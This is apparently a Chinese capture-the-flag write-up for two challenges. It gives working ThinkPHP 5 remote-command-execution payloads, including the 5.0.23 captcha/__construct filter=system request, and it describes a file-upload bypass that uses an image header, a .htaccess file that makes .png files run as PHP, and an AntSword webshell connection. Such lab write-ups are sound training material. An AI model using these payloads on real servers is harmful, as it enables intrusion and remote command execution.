[BJDCTF 2nd]old-hack
打开题目看到
找了找也没有什么可以利用的信息
先试试一个thinkphp5远程命令执行的漏洞:
?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1
然后就出现了
thinkphp5.0.23,思路很清晰了直接用payload:
?s=captcha,并且设置post:_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=命令
可以在左上角看到已经成功执行了命令。接下来就是输入命令找flag,
[GXYCTF2019]BabyUpload
文件上传,先看看直接传马
直接上传php不行,改成图片但还是php也不行,可能对文件头有检验,改文件头看一下,貌似还是不行,试一试另外一种马
加上图片头
上传成功。但是不能直接解析png文件,我们要想办法让png文件可以被解析。
看能不能上传如上的一个.htaccess文件,这样就可以把png解析为php。
把.htaccess的文件类型改一下,就可以上传成功
蚁剑连接拿到flag